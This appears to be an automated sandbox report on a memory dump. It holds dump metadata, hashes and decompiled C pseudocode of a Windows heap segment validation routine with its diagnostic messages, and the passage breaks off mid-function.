                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                        • API String ID: 0-4009184096
                                                        • Opcode ID: ddb0b37af42847ab67ac48456f5d5b07dc1fd92055d8fb3b8431d4931cb761ed
                                                        • Instruction ID: 661c1a94d9415cd7f6a0aadaa870046b9a3adacef26f782019fcff749921fe3f
                                                        • Opcode Fuzzy Hash: ddb0b37af42847ab67ac48456f5d5b07dc1fd92055d8fb3b8431d4931cb761ed
                                                        • Instruction Fuzzy Hash: CD022CF1D046289FDB30DF548C80BAAB7F8AB59304F4541EAE649A7212E6309F84DF59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 58%
                                                        			E00BEFDDD(signed int _a4, signed int _a8, intOrPtr* _a16, signed int* _a20, signed int* _a24, intOrPtr _a28, intOrPtr _a32) {
                                                        				signed int _v8;
                                                        				signed int* _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				signed int _v28;
                                                        				signed int _v32;
                                                        				signed int _v36;
                                                        				signed int _v40;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* __ebp;
                                                        				signed int _t339;
                                                        				intOrPtr _t361;
                                                        				signed int _t365;
                                                        				signed short _t377;
                                                        				signed char _t380;
                                                        				signed int* _t382;
                                                        				signed char _t383;
                                                        				signed int _t384;
                                                        				intOrPtr _t386;
                                                        				unsigned int _t401;
                                                        				signed int _t402;
                                                        				intOrPtr _t409;
                                                        				intOrPtr _t423;
                                                        				signed int _t450;
                                                        				intOrPtr _t452;
                                                        				intOrPtr* _t463;
                                                        				signed int _t465;
                                                        				signed int* _t466;
                                                        				signed int _t467;
                                                        				intOrPtr _t468;
                                                        				signed short _t469;
                                                        				signed int _t471;
                                                        				signed int _t472;
                                                        				signed int _t475;
                                                        				signed short* _t486;
                                                        				signed short _t487;
                                                        				signed int* _t489;
                                                        				signed int _t490;
                                                        				signed int _t498;
                                                        				signed int _t501;
                                                        				signed int _t502;
                                                        				signed int _t511;
                                                        				signed short _t513;
                                                        				signed short _t514;
                                                        				signed int _t515;
                                                        				signed int* _t519;
                                                        				signed int _t523;
                                                        				signed int _t532;
                                                        				signed int _t534;
                                                        				signed int* _t535;
                                                        				signed int _t537;
                                                        				void* _t539;
                                                        				signed int _t549;
                                                        				signed int _t551;
                                                        				intOrPtr _t557;
                                                        				intOrPtr _t561;
                                                        				signed int _t570;
                                                        				intOrPtr* _t582;
                                                        				signed int _t583;
                                                        				signed int* _t584;
                                                        				void* _t585;
                                                        				signed int _t586;
                                                        				signed int _t588;
                                                        				signed int _t589;
                                                        				signed int _t590;
                                                        				signed int _t592;
                                                        				signed int* _t594;
                                                        				signed short _t595;
                                                        				signed short _t597;
                                                        				signed int _t604;
                                                        				signed int _t605;
                                                        				signed int _t607;
                                                        				signed short _t609;
                                                        				signed short _t611;
                                                        				signed int _t613;
                                                        				signed int _t615;
                                                        				signed int _t616;
                                                        				signed int _t621;
                                                        				signed int _t622;
                                                        				signed int _t623;
                                                        				intOrPtr _t626;
                                                        				signed int* _t627;
                                                        				intOrPtr _t628;
                                                        				signed int _t630;
                                                        				signed int* _t632;
                                                        				signed int _t633;
                                                        				signed int _t634;
                                                        				signed int _t636;
                                                        				signed int _t638;
                                                        				signed int* _t642;
                                                        				signed short _t643;
                                                        				signed short _t645;
                                                        				signed int _t646;
                                                        				void* _t650;
                                                        				signed int _t652;
                                                        				signed int _t654;
                                                        				signed int* _t656;
                                                        				signed short _t664;
                                                        				signed short _t667;
                                                        				intOrPtr _t668;
                                                        				intOrPtr _t669;
                                                        				signed int _t670;
                                                        				signed int _t671;
                                                        				void* _t690;
                                                        
                                                        				_t671 = _a8;
                                                        				_t339 = 0;
                                                        				_v32 = 0;
                                                        				_v36 = 0;
                                                        				_v24 = 0;
                                                        				if(_t671 >=  *((intOrPtr*)(_t671 + 0x28))) {
                                                        					L176:
                                                        					_t668 = _v32;
                                                        					__eflags =  *((intOrPtr*)(_t671 + 0x2c)) - _t668;
                                                        					if( *((intOrPtr*)(_t671 + 0x2c)) == _t668) {
                                                        						_t669 = _v36;
                                                        						__eflags =  *((intOrPtr*)(_t671 + 0x30)) - _t669;
                                                        						if( *((intOrPtr*)(_t671 + 0x30)) == _t669) {
                                                        							goto L203;
                                                        						}
                                                        						_t557 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        						__eflags =  *((intOrPtr*)(_t557 + 0xc)) - _t339;
                                                        						if( *((intOrPtr*)(_t557 + 0xc)) == _t339) {
                                                        							_push("HEAP: ");
                                                        							E00B9373B();
                                                        						} else {
                                                        							E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        						}
                                                        						_push(_t669);
                                                        						_push( *((intOrPtr*)(_t671 + 0x30)));
                                                        						_push(_t671);
                                                        						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                                        						L211:
                                                        						E00B9373B();
                                                        						goto L186;
                                                        					}
                                                        					_t561 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        					__eflags =  *((intOrPtr*)(_t561 + 0xc)) - _t339;
                                                        					if( *((intOrPtr*)(_t561 + 0xc)) == _t339) {
                                                        						_push("HEAP: ");
                                                        						E00B9373B();
                                                        					} else {
                                                        						E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        					}
                                                        					_push(_t668);
                                                        					_push( *((intOrPtr*)(_t671 + 0x2c)));
                                                        					_push(_t671);
                                                        					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                                        					goto L211;
                                                        				} else {
                                                        					_t670 = _a4;
                                                        					do {
                                                        						_t532 = 0;
                                                        						 *_a24 = _t671;
                                                        						if( *(_t670 + 0x4c) != 0) {
                                                        							 *_t671 =  *_t671 ^  *(_t670 + 0x50);
                                                        							_t679 =  *(_t671 + 3) - ( *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671);
                                                        							if( *(_t671 + 3) != ( *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671)) {
                                                        								_push(0);
                                                        								_push(_t671);
                                                        								_push(_t670);
                                                        								E00BEF8EE(0, _t670, _t671, _t679);
                                                        							}
                                                        						}
                                                        						if(_v24 != ( *(_t671 + 4) ^  *(_t670 + 0x54))) {
                                                        							_t361 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        							__eflags =  *((intOrPtr*)(_t361 + 0xc)) - _t532;
                                                        							if( *((intOrPtr*)(_t361 + 0xc)) == _t532) {
                                                        								_push("HEAP: ");
                                                        								E00B9373B();
                                                        							} else {
                                                        								E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        							}
                                                        							_push(_v24 & 0x0000ffff);
                                                        							_t365 =  *(_t671 + 4) & 0x0000ffff ^  *(_t670 + 0x54) & 0x0000ffff;
                                                        							__eflags = _t365;
                                                        							_push(_t365);
                                                        							E00B9373B("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t671);
                                                        							L183:
                                                        							_t690 =  *(_t670 + 0x4c) - _t532;
                                                        							L184:
                                                        							if(_t690 != 0) {
                                                        								 *(_t671 + 3) =  *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671;
                                                        								 *_t671 =  *_t671 ^  *(_t670 + 0x50);
                                                        							}
                                                        							L186:
                                                        							return 0;
                                                        						}
                                                        						_t377 =  *_t671 & 0x0000ffff;
                                                        						_v24 = _t377 & 0x0000ffff;
                                                        						_t568 = _t377 & 0x0000ffff;
                                                        						_a4 = _t568 << 3;
                                                        						_t380 =  *(_t671 + 2);
                                                        						if((_t380 & 0x00000001) == 0) {
                                                        							__eflags =  *(_t670 + 0x40) & 0x00000040;
                                                        							if(( *(_t670 + 0x40) & 0x00000040) == 0) {
                                                        								L154:
                                                        								 *_a16 =  *_a16 + 1;
                                                        								_t382 = _a20;
                                                        								 *_t382 =  *_t382 + ( *_t671 & 0x0000ffff);
                                                        								__eflags =  *_t382;
                                                        								L155:
                                                        								_t383 =  *(_t671 + 6);
                                                        								__eflags = _t383;
                                                        								if(_t383 == 0) {
                                                        									_t384 = _t670;
                                                        								} else {
                                                        									_t384 = (_t671 & 0xffff0000) - ((_t383 & 0x000000ff) << 0x10) + 0x10000;
                                                        								}
                                                        								_t570 = _a8;
                                                        								__eflags = _t384 - _t570;
                                                        								if(_t384 != _t570) {
                                                        									_t386 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        									__eflags =  *((intOrPtr*)(_t386 + 0xc)) - _t532;
                                                        									if( *((intOrPtr*)(_t386 + 0xc)) == _t532) {
                                                        										_push("HEAP: ");
                                                        										E00B9373B();
                                                        									} else {
                                                        										E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        									}
                                                        									_push( *(_t671 + 6) & 0x000000ff);
                                                        									_push(_t671);
                                                        									_push("Heap block at %p has incorrect segment offset (%x)\n");
                                                        									goto L195;
                                                        								} else {
                                                        									__eflags =  *((char*)(_t671 + 7)) - 3;
                                                        									if( *((char*)(_t671 + 7)) != 3) {
                                                        										__eflags =  *(_t670 + 0x4c) - _t532;
                                                        										if( *(_t670 + 0x4c) != _t532) {
                                                        											 *(_t671 + 3) =  *(_t671 + 1) ^  *_t671 ^  *(_t671 + 2);
                                                        											 *_t671 =  *_t671 ^  *(_t670 + 0x50);
                                                        											__eflags =  *_t671;
                                                        										}
                                                        										_t671 = _t671 + _a4;
                                                        										__eflags = _t671;
                                                        										goto L174;
                                                        									}
                                                        									_t401 =  *(_t671 + 0x1c);
                                                        									__eflags = _t401 - _t532;
                                                        									if(_t401 == _t532) {
                                                        										_t402 =  *_t671 & 0x0000ffff;
                                                        										__eflags = _t671 + _t402 * 8 -  *((intOrPtr*)(_t570 + 0x28));
                                                        										if(_t671 + _t402 * 8 ==  *((intOrPtr*)(_t570 + 0x28))) {
                                                        											__eflags =  *(_t670 + 0x4c) - _t532;
                                                        											if( *(_t670 + 0x4c) != _t532) {
                                                        												 *(_t671 + 3) =  *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671;
                                                        												 *_t671 =  *_t671 ^  *(_t670 + 0x50);
                                                        												__eflags =  *_t671;
                                                        											}
                                                        											L203:
                                                        											return 1;
                                                        										}
                                                        										_t409 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        										__eflags =  *((intOrPtr*)(_t409 + 0xc)) - _t532;
                                                        										if( *((intOrPtr*)(_t409 + 0xc)) == _t532) {
                                                        											_push("HEAP: ");
                                                        											E00B9373B();
                                                        										} else {
                                                        											E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        										}
                                                        										_push( *((intOrPtr*)(_a8 + 0x28)));
                                                        										_push(_t671);
                                                        										_push("Heap block at %p is not last block in segment (%p)\n");
                                                        										L195:
                                                        										E00B9373B();
                                                        										goto L183;
                                                        									}
                                                        									_v36 = _v36 + 1;
                                                        									_v32 = _v32 + (_t401 >> 0xc);
                                                        									__eflags =  *(_t670 + 0x4c) - _t532;
                                                        									if( *(_t670 + 0x4c) != _t532) {
                                                        										 *(_t671 + 3) =  *(_t671 + 1) ^  *_t671 ^  *(_t671 + 2);
                                                        										 *_t671 =  *_t671 ^  *(_t670 + 0x50);
                                                        										__eflags =  *_t671;
                                                        									}
                                                        									_t671 = _t671 +  *(_t671 + 0x1c) + 0x20;
                                                        									__eflags = _t671 -  *((intOrPtr*)(_t570 + 0x28));
                                                        									if(_t671 ==  *((intOrPtr*)(_t570 + 0x28))) {
                                                        										L170:
                                                        										_v24 = _t532;
                                                        										goto L174;
                                                        									} else {
                                                        										__eflags =  *(_t670 + 0x4c) - _t532;
                                                        										if( *(_t670 + 0x4c) != _t532) {
                                                        											 *_t671 =  *_t671 ^  *(_t670 + 0x50);
                                                        											__eflags =  *(_t671 + 3) - ( *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671);
                                                        											if(__eflags != 0) {
                                                        												_push(_t532);
                                                        												_push(_t671);
                                                        												_push(_t670);
                                                        												E00BEF8EE(_t532, _t670, _t671, __eflags);
                                                        											}
                                                        										}
                                                        										__eflags =  *(_t671 + 4) ^  *(_t670 + 0x54);
                                                        										if(( *(_t671 + 4) ^  *(_t670 + 0x54)) != 0) {
                                                        											_t423 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        											__eflags =  *((intOrPtr*)(_t423 + 0xc)) - _t532;
                                                        											if( *((intOrPtr*)(_t423 + 0xc)) == _t532) {
                                                        												_push("HEAP: ");
                                                        												E00B9373B();
                                                        											} else {
                                                        												E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        											}
                                                        											_push( *(_t671 + 4) & 0x0000ffff ^  *(_t670 + 0x54) & 0x0000ffff);
                                                        											_push(_t671);
                                                        											_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                                        											goto L195;
                                                        										} else {
                                                        											__eflags =  *(_t670 + 0x4c) - _t532;
                                                        											if( *(_t670 + 0x4c) != _t532) {
                                                        												 *(_t671 + 3) =  *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671;
                                                        												 *_t671 =  *_t671 ^  *(_t670 + 0x50);
                                                        												__eflags =  *_t671;
                                                        											}
                                                        											goto L170;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							__eflags = _t380 & 0x00000004;
                                                        							if((_t380 & 0x00000004) == 0) {
                                                        								goto L154;
                                                        							}
                                                        							_t534 = _a4 + 0xfffffff0;
                                                        							__eflags = _t380 & 0x00000002;
                                                        							if((_t380 & 0x00000002) != 0) {
                                                        								__eflags = _t534 - 4;
                                                        								if(_t534 > 4) {
                                                        									_t534 = _t534 - 4;
                                                        									__eflags = _t534;
                                                        								}
                                                        							}
                                                        							__eflags = _t380 & 0x00000008;
                                                        							if((_t380 & 0x00000008) == 0) {
                                                        								_t450 = E00B78950(_t671 + 0x10, _t534, 0xfeeefeee);
                                                        								_v40 = _t450;
                                                        								__eflags = _t450 - _t534;
                                                        								if(_t450 != _t534) {
                                                        									_t452 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        									__eflags =  *(_t452 + 0xc);
                                                        									if( *(_t452 + 0xc) == 0) {
                                                        										_push("HEAP: ");
                                                        										E00B9373B();
                                                        									} else {
                                                        										E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        									}
                                                        									_push(_t671 + 8 + _v40);
                                                        									E00B9373B("Free Heap block %p modified at %p after it was freed\n", _t671);
                                                        									__eflags =  *(_t670 + 0x4c);
                                                        									goto L184;
                                                        								}
                                                        								_t532 = 0;
                                                        								__eflags = 0;
                                                        								goto L154;
                                                        							} else {
                                                        								_t535 =  *(_t671 + 0xc);
                                                        								_t463 = _t671 + 8;
                                                        								_t627 =  *_t463;
                                                        								_v12 = _t627;
                                                        								_t628 =  *((intOrPtr*)(_t627 + 4));
                                                        								_v40 = _t535;
                                                        								_t536 =  *_t535;
                                                        								__eflags = _t536 - _t628;
                                                        								if(__eflags != 0) {
                                                        									L61:
                                                        									_push(0);
                                                        									_push(_t536);
                                                        									_push(_t628);
                                                        									_push(_t463);
                                                        									_push(_t670);
                                                        									_push(0xc);
                                                        									E00BEF840(_t536, _t568, _t628, _t670, _t671, __eflags);
                                                        									goto L174;
                                                        								}
                                                        								__eflags = _t536 - _t463;
                                                        								if(__eflags != 0) {
                                                        									goto L61;
                                                        								}
                                                        								_t465 =  *(_t670 + 0xb8);
                                                        								 *((intOrPtr*)(_t670 + 0x78)) =  *((intOrPtr*)(_t670 + 0x78)) - _t568;
                                                        								__eflags = _t465;
                                                        								if(_t465 == 0) {
                                                        									L58:
                                                        									_t466 = _v12;
                                                        									_t582 = _v40;
                                                        									 *_t582 = _t466;
                                                        									 *((intOrPtr*)(_t466 + 4)) = _t582;
                                                        									__eflags =  *(_t671 + 2) & 0x00000008;
                                                        									if(__eflags == 0) {
                                                        										L62:
                                                        										_t537 =  *_t671 & 0x0000ffff;
                                                        										 *(_t671 + 2) = 0;
                                                        										 *((char*)(_t671 + 7)) = 0;
                                                        										_t467 =  *(_t670 + 0xb8);
                                                        										_v20 = _t537;
                                                        										__eflags = _t467;
                                                        										if(_t467 != 0) {
                                                        											while(1) {
                                                        												__eflags = _t537 -  *((intOrPtr*)(_t467 + 4));
                                                        												if(_t537 <  *((intOrPtr*)(_t467 + 4))) {
                                                        													break;
                                                        												}
                                                        												_t583 =  *_t467;
                                                        												__eflags = _t583;
                                                        												if(_t583 == 0) {
                                                        													_t630 =  *((intOrPtr*)(_t467 + 4)) - 1;
                                                        													__eflags = _t630;
                                                        													_v28 = _t630;
                                                        													L75:
                                                        													_t584 = _t467 + 0x14;
                                                        													while(1) {
                                                        														_a4 = _t467;
                                                        														_v16 = _t630 -  *_t584;
                                                        														_t632 =  *((intOrPtr*)(_t467 + 0x18));
                                                        														_t468 =  *((intOrPtr*)(_t632 + 4));
                                                        														_v12 = _t632;
                                                        														__eflags = _t632 - _t468;
                                                        														if(_t632 != _t468) {
                                                        															goto L78;
                                                        														}
                                                        														L77:
                                                        														_v8 = _t632;
                                                        														L121:
                                                        														_t472 = _v8;
                                                        														__eflags = _t472;
                                                        														if(_t472 != 0) {
                                                        															L64:
                                                        															_t107 = _t670 + 0xc4; // 0xc5
                                                        															_t539 = _t107;
                                                        															__eflags = _t539 - _t472;
                                                        															if(_t539 == _t472) {
                                                        																L126:
                                                        																_t634 =  *(_t472 + 4);
                                                        																_t585 =  *_t634;
                                                        																__eflags = _t585 - _t472;
                                                        																if(_t585 != _t472) {
                                                        																	__eflags = 0;
                                                        																	_push(0);
                                                        																	_push(_t585);
                                                        																	_push(0);
                                                        																	_push(_t472);
                                                        																	_push(0);
                                                        																	_push(0xc);
                                                        																	E00BEF840(_t539, _t585, 0, _t670, _t671, 0);
                                                        																} else {
                                                        																	_t594 = _t671 + 8;
                                                        																	 *_t594 = _t472;
                                                        																	_t594[1] = _t634;
                                                        																	 *_t634 = _t594;
                                                        																	 *(_t472 + 4) = _t594;
                                                        																}
                                                        																 *((intOrPtr*)(_t670 + 0x78)) =  *((intOrPtr*)(_t670 + 0x78)) + ( *_t671 & 0x0000ffff);
                                                        																_t475 =  *(_t670 + 0xb8);
                                                        																__eflags = _t475;
                                                        																if(_t475 == 0) {
                                                        																	L150:
                                                        																	__eflags =  *(_t670 + 0x4c);
                                                        																	if( *(_t670 + 0x4c) != 0) {
                                                        																		 *(_t671 + 3) =  *(_t671 + 1) ^  *_t671 ^  *(_t671 + 2);
                                                        																		 *_t671 =  *_t671 ^  *(_t670 + 0x50);
                                                        																	}
                                                        																	goto L174;
                                                        																} else {
                                                        																	_t586 =  *_t671 & 0x0000ffff;
                                                        																	while(1) {
                                                        																		__eflags = _t586 -  *((intOrPtr*)(_t475 + 4));
                                                        																		if(_t586 <  *((intOrPtr*)(_t475 + 4))) {
                                                        																			break;
                                                        																		}
                                                        																		_t636 =  *_t475;
                                                        																		__eflags = _t636;
                                                        																		if(_t636 == 0) {
                                                        																			_t638 =  *((intOrPtr*)(_t475 + 4)) - 1;
                                                        																			__eflags = _t638;
                                                        																			L136:
                                                        																			_t588 = _t638 -  *((intOrPtr*)(_t475 + 0x14));
                                                        																			__eflags =  *(_t475 + 8);
                                                        																			_v28 = _t588;
                                                        																			if( *(_t475 + 8) != 0) {
                                                        																				_t588 = _t588 + _t588;
                                                        																				__eflags = _t588;
                                                        																			}
                                                        																			 *((intOrPtr*)(_t475 + 0xc)) =  *((intOrPtr*)(_t475 + 0xc)) + 1;
                                                        																			_t589 = _t588 << 2;
                                                        																			_a4 = _t589;
                                                        																			_t590 =  *(_t589 +  *((intOrPtr*)(_t475 + 0x20)));
                                                        																			_v40 = _t590;
                                                        																			__eflags = _t638 -  *((intOrPtr*)(_t475 + 4)) - 1;
                                                        																			if(_t638 ==  *((intOrPtr*)(_t475 + 4)) - 1) {
                                                        																				_t207 = _t475 + 0x10;
                                                        																				 *_t207 =  *(_t475 + 0x10) + 1;
                                                        																				__eflags =  *_t207;
                                                        																			}
                                                        																			__eflags = _t590;
                                                        																			if(_t590 == 0) {
                                                        																				L147:
                                                        																				 *((intOrPtr*)(_a4 +  *((intOrPtr*)(_t475 + 0x20)))) = _t671 + 8;
                                                        																				_t590 = _v40;
                                                        																				goto L148;
                                                        																			} else {
                                                        																				__eflags =  *(_t670 + 0x4c);
                                                        																				if( *(_t670 + 0x4c) == 0) {
                                                        																					_t643 =  *(_t590 - 8) & 0x0000ffff;
                                                        																				} else {
                                                        																					_t645 =  *(_t590 - 8);
                                                        																					__eflags =  *(_t670 + 0x4c) & _t645;
                                                        																					if(( *(_t670 + 0x4c) & _t645) != 0) {
                                                        																						_t645 = _t645 ^  *(_t670 + 0x50);
                                                        																						__eflags = _t645;
                                                        																					}
                                                        																					_t643 = _t645 & 0x0000ffff;
                                                        																				}
                                                        																				__eflags = ( *_t671 & 0x0000ffff) - (_t643 & 0x0000ffff);
                                                        																				if(( *_t671 & 0x0000ffff) - (_t643 & 0x0000ffff) > 0) {
                                                        																					L148:
                                                        																					__eflags = _t590;
                                                        																					if(_t590 == 0) {
                                                        																						_t592 = _v28;
                                                        																						_t642 =  *((intOrPtr*)(_t475 + 0x1c)) + (_t592 >> 5) * 4;
                                                        																						 *_t642 =  *_t642 | 1 << (_t592 & 0x0000001f);
                                                        																						__eflags =  *_t642;
                                                        																					}
                                                        																					goto L150;
                                                        																				} else {
                                                        																					goto L147;
                                                        																				}
                                                        																			}
                                                        																		}
                                                        																		_t475 = _t636;
                                                        																	}
                                                        																	_t638 = _t586;
                                                        																	goto L136;
                                                        																}
                                                        															}
                                                        															_t646 =  *(_t670 + 0x4c);
                                                        															while(1) {
                                                        																__eflags = _t646;
                                                        																if(_t646 == 0) {
                                                        																	_t595 =  *(_t472 - 8) & 0x0000ffff;
                                                        																} else {
                                                        																	_t597 =  *(_t472 - 8);
                                                        																	_t646 =  *(_t670 + 0x4c);
                                                        																	__eflags = _t646 & _t597;
                                                        																	if((_t646 & _t597) != 0) {
                                                        																		_t597 = _t597 ^  *(_t670 + 0x50);
                                                        																		__eflags = _t597;
                                                        																	}
                                                        																	_t595 = _t597 & 0x0000ffff;
                                                        																}
                                                        																__eflags = _v20 - (_t595 & 0x0000ffff);
                                                        																if(_v20 <= (_t595 & 0x0000ffff)) {
                                                        																	goto L126;
                                                        																}
                                                        																_t472 =  *_t472;
                                                        																__eflags = _t539 - _t472;
                                                        																if(_t539 != _t472) {
                                                        																	continue;
                                                        																}
                                                        																goto L126;
                                                        															}
                                                        															goto L126;
                                                        														}
                                                        														_t467 =  *_a4;
                                                        														_t537 = _v20;
                                                        														_t584 = _t467 + 0x14;
                                                        														_t630 =  *_t584;
                                                        														_v28 = _t630;
                                                        														_a4 = _t467;
                                                        														_v16 = _t630 -  *_t584;
                                                        														_t632 =  *((intOrPtr*)(_t467 + 0x18));
                                                        														_t468 =  *((intOrPtr*)(_t632 + 4));
                                                        														_v12 = _t632;
                                                        														__eflags = _t632 - _t468;
                                                        														if(_t632 != _t468) {
                                                        															goto L78;
                                                        														}
                                                        														goto L77;
                                                        														L78:
                                                        														_t633 =  *(_t670 + 0x4c);
                                                        														__eflags = _t633;
                                                        														if(_t633 == 0) {
                                                        															_t469 =  *(_t468 - 8) & 0x0000ffff;
                                                        														} else {
                                                        															_t514 =  *(_t468 - 8);
                                                        															_t633 =  *(_t670 + 0x4c);
                                                        															__eflags = _t514 & _t633;
                                                        															if((_t514 & _t633) != 0) {
                                                        																_t514 = _t514 ^  *(_t670 + 0x50);
                                                        																__eflags = _t514;
                                                        															}
                                                        															_t469 = _t514 & 0x0000ffff;
                                                        														}
                                                        														_t471 = _v12;
                                                        														__eflags = _t537 - (_t469 & 0x0000ffff);
                                                        														if(_t537 - (_t469 & 0x0000ffff) > 0) {
                                                        															L119:
                                                        															_v8 = _t471;
                                                        															goto L121;
                                                        														} else {
                                                        															_t486 =  *_t471 - 8;
                                                        															__eflags = _t633;
                                                        															if(_t633 == 0) {
                                                        																_t487 =  *_t486 & 0x0000ffff;
                                                        															} else {
                                                        																_t513 =  *_t486;
                                                        																_t633 =  *(_t670 + 0x4c);
                                                        																__eflags = _t513 & _t633;
                                                        																if((_t513 & _t633) != 0) {
                                                        																	_t513 = _t513 ^  *(_t670 + 0x50);
                                                        																	__eflags = _t513;
                                                        																}
                                                        																_t487 = _t513 & 0x0000ffff;
                                                        															}
                                                        															__eflags = _v20 - (_t487 & 0x0000ffff);
                                                        															if(_v20 - (_t487 & 0x0000ffff) > 0) {
                                                        																_t489 = _a4;
                                                        																__eflags =  *_t489;
                                                        																if( *_t489 != 0) {
                                                        																	L105:
                                                        																	_t490 = _a4;
                                                        																	_t549 = _v16 >> 5;
                                                        																	_v12 =  *((intOrPtr*)(_t490 + 0x1c)) + _t549 * 4;
                                                        																	_t650 = ( *((intOrPtr*)(_t490 + 4)) -  *_t584 >> 5) - 1;
                                                        																	_t498 =  !((1 << (_v16 & 0x0000001f)) - 1) &  *_v12;
                                                        																	__eflags = 1;
                                                        																	if(1 != 0) {
                                                        																		L109:
                                                        																		__eflags = _t498 & 0x0000ffff;
                                                        																		if((_t498 & 0x0000ffff) == 0) {
                                                        																			_t604 = _t498 >> 0x00000010 & 0x000000ff;
                                                        																			__eflags = _t604;
                                                        																			if(_t604 == 0) {
                                                        																				_t171 = (_t498 >> 0x18) + 0xb537f8; // 0x10008
                                                        																				_t501 = ( *_t171 & 0x000000ff) + 0x18;
                                                        																				__eflags = _t501;
                                                        																			} else {
                                                        																				_t170 = _t604 + 0xb537f8; // 0x10008
                                                        																				_t501 = ( *_t170 & 0x000000ff) + 0x10;
                                                        																			}
                                                        																		} else {
                                                        																			_t652 = _t498 & 0x000000ff;
                                                        																			__eflags = _t652;
                                                        																			if(_t652 == 0) {
                                                        																				_t169 = (_t498 >> 0x00000008 & 0x000000ff) + 0xb537f8; // 0x10008
                                                        																				_t501 = ( *_t169 & 0x000000ff) + 8;
                                                        																			} else {
                                                        																				_t168 = _t652 + 0xb537f8; // 0x10008
                                                        																				_t501 =  *_t168 & 0x000000ff;
                                                        																			}
                                                        																		}
                                                        																		_t551 = (_t549 << 5) + _t501;
                                                        																		_t502 = _a4;
                                                        																		__eflags =  *(_t502 + 8);
                                                        																		_t605 = _t551 + _t551;
                                                        																		if( *(_t502 + 8) == 0) {
                                                        																			_t605 = _t551;
                                                        																		}
                                                        																		_t471 =  *( *((intOrPtr*)(_t502 + 0x20)) + _t605 * 4);
                                                        																		goto L119;
                                                        																	} else {
                                                        																		goto L106;
                                                        																	}
                                                        																	while(1) {
                                                        																		L106:
                                                        																		__eflags = _t549 - _t650;
                                                        																		if(_t549 > _t650) {
                                                        																			break;
                                                        																		}
                                                        																		_v12 =  &(_v12[1]);
                                                        																		_t498 =  *_v12;
                                                        																		_t549 = _t549 + 1;
                                                        																		__eflags = _t498;
                                                        																		if(_t498 == 0) {
                                                        																			continue;
                                                        																		}
                                                        																		break;
                                                        																	}
                                                        																	__eflags = _t498;
                                                        																	if(_t498 == 0) {
                                                        																		_t179 =  &_v8;
                                                        																		 *_t179 = _v8 & 0x00000000;
                                                        																		__eflags =  *_t179;
                                                        																		goto L121;
                                                        																	}
                                                        																	goto L109;
                                                        																}
                                                        																__eflags = _v28 - _t489[1] - 1;
                                                        																if(_v28 != _t489[1] - 1) {
